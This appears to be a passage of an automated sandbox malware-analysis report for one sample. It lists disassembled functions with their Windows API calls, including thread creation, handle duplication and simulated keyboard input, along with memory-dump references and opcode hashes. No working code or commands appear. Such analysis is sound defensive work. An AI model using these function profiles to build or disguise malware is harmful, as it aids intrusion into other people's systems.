                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID: Msctls_Progress32
                                                                                                        • API String ID: 3850602802-3636473452
                                                                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                        Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                        • String ID:
                                                                                                        • API String ID: 3985565216-0
                                                                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                        Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 0041F707
                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                        • _free.LIBCMT ref: 0041F71A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                        • String ID: [B
                                                                                                        • API String ID: 1020059152-632041663
                                                                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                        Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                        • __getptd.LIBCMT ref: 00413DBD
                                                                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                        • _free.LIBCMT ref: 00413E07
                                                                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 155776804-0
                                                                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                        Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1957940570-0
                                                                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                        Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                        • String ID:
                                                                                                        • API String ID: 259663610-0
                                                                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                        Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 3220332590-0
                                                                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                        Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1612042205-0
                                                                                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                        Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strncmp
                                                                                                        • String ID: >$U$\
                                                                                                        • API String ID: 2666721431-237099441
                                                                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                        Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 2221674350-0
                                                                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                        Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                        • String ID:
                                                                                                        • API String ID: 2037614760-0
                                                                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                        Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                        • String ID:
                                                                                                        • API String ID: 960795272-0
                                                                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                        Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189319755-0
                                                                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                        Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
